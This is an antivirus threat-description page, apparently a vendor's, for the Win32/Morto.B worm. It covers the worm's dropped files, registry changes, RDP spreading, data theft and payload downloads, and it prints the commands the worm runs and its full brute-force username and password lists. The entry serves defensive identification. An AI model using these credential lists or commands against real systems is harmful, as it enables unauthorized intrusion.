Win32/Morto [Threat Name] go to Threat

Win32/Morto.B [Threat Variant Name]

Category worm
Size 49932 B
Detection created Aug 30, 2011
Detection database version 6422
Aliases Net-Worm.Win32.Morto.b (Kaspersky)
  W32/Morto.a.virus (McAfee)
  Worm:Win32/Morto.gen!A (Microsoft)
Short description

Win32/Morto.B is a worm that spreads via network exploiting vulnerabilities of the operating system. The worm tries to download and execute several files from the Internet.

Installation

When executed, the worm creates the following files:

  • %windir%\­clb.dll (6656 B, Win32/Morto.B)
  • %windir%\­Offline Web Pages\­cache.txt (6656 B, Win32/Morto.B)
  • %windir%\­temp\­ntshrui.dll (6656 B, Win32/Morto.B)

The worm may create copies of the following files (source, destination):

  • %system%\­sens.dll, %system%\­sens32.dll
  • %system%\­ntmssvc.dll, %system%\­ntmssvc32.dll
  • %system%\­netman.dll, %system%\­netman32.dll
  • %system%\­rasauto.dll, %system%\­rasauto32.dll

The following Registry entries are created:

  • [HKEY_LOCAL_MACHINE\­CurrentControlSet\­Services\­%existingservicename%\­Parameters]
    • "ServiceDll" = "%windir%\­temp\­ntshrui.dll"
  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Control\­Windows]
    • "NoPopUpsOnBoot" = 1
  • [HKEY_LOCAL_MACHINE\­System\­CurrentControlSet\­Control\­SafeBoot\­Minimal\­%existingservicename%]
    • "(Default)" = "Service"
  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Services\­%copiedservicename%]
    • "DependOnService" = ""
    • "Group" = "SchedulerGroup"
  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Services\­%copiedservicename%\­Parameters]
    • "ServiceDll" = "%originaldll%32.dll"
  • [HKEY_LOCAL_MACHINE\­System\­Wpa]
    • "it" = "%variable1%"
    • "rmk" = "%variable2%"
    • "if" = "%variable3%"
    • "ct" = "%variable4%"
    • "lscan" = "%variable5%"
    • "rmd" = "%variable6%"
    • "cmd" = "%variable7%"
    • "md" = %malwarebody%
    • "ie" = "%malwarefilepath%"
    • "sn" = "%servicename1%"
    • "sr" = "%servicename2%"

A string with variable content is used instead of %variable1-7% .


After the installation is complete, the worm deletes the original executable file.

Spreading

Win32/Morto.B is a worm that spreads via network exploiting vulnerabilities of the operating system.


The worm generates various IP addresses. If it succeeds, a copy of the worm is retrieved from the attacking machine using RDP protocol.


The following files are dropped:

  • a.dll (6656 B, Win32/Morto.b)
  • r.reg (1198 B)

The worm executes the following commands:

  • regedit /s\­\­tsclient\­a\­r.reg
  • rundll32\­\­tsclient\­a\­a.dll

The following usernames are used:

  • 1
  • a
  • actuser
  • adm
  • admin
  • admin1
  • admin2
  • administrator
  • aspnet
  • backup
  • console
  • david
  • guest
  • john
  • owner
  • root
  • server
  • sql
  • support
  • support_388945a0
  • sys
  • test
  • test1
  • test2
  • test3
  • user
  • user1
  • user2
  • user3
  • user4
  • user5

The following passwords are used:

  • !@#$
  • !@#$%
  • !@#$%^
  • !@#$%^&*
  • %u%
  • %u%1
  • %u%111111
  • %u%12
  • %u%123
  • %u%1234
  • %u%123456
  • 0
  • 000000
  • 1
  • 111
  • 1111
  • 111111
  • 1111111
  • 111222
  • 112233
  • 11223344
  • 12
  • 121212
  • 123
  • 123123
  • 123321
  • 12344321
  • 12345
  • 123456
  • 1234567
  • 12345678
  • 123456789
  • 1234567890
  • 1234qwer
  • 1313
  • 1314520
  • 159357
  • 168168
  • 1q2w3e
  • 1QAZ
  • 1qaz2wsx
  • 2010
  • 2011
  • 2012
  • 2222
  • 22222222
  • 3
  • 31415926
  • 369
  • 4321
  • 520
  • 520520
  • 654321
  • 666666
  • 7
  • 7777
  • 7777777
  • 77777777
  • 789456
  • 888888
  • 88888888
  • 987654
  • 987654321
  • 999999
  • a
  • aaa
  • abc
  • abc123
  • abcd
  • abcd1234
  • admin
  • admin123
  • computer
  • dragon
  • iloveyou
  • letmein
  • pass
  • password
  • PASSWORD
  • princess
  • qazwsx
  • rockyou
  • root
  • secret
  • server
  • super
  • test
  • user
  • Z1234
  • zxcvbnm
Information stealing

The worm collects the following information:

  • CPU information
  • memory status
  • antivirus software detected on the affected machine

The worm attempts to send gathered information to a remote machine.

Other information

The worm acquires data and commands from a remote computer or the Internet.


The worm contains a list of (9) URLs.


It can execute the following operations:

  • perform DoS/DDoS attacks
  • send gathered information

The worm tries to download several files from the Internet.


These are stored in the following locations:

  • %temp%\­~MTMP%variable%.exe

The files are then executed.


The %variable% represents a random number.


Please enable Javascript to ensure correct displaying of this content and refresh this page.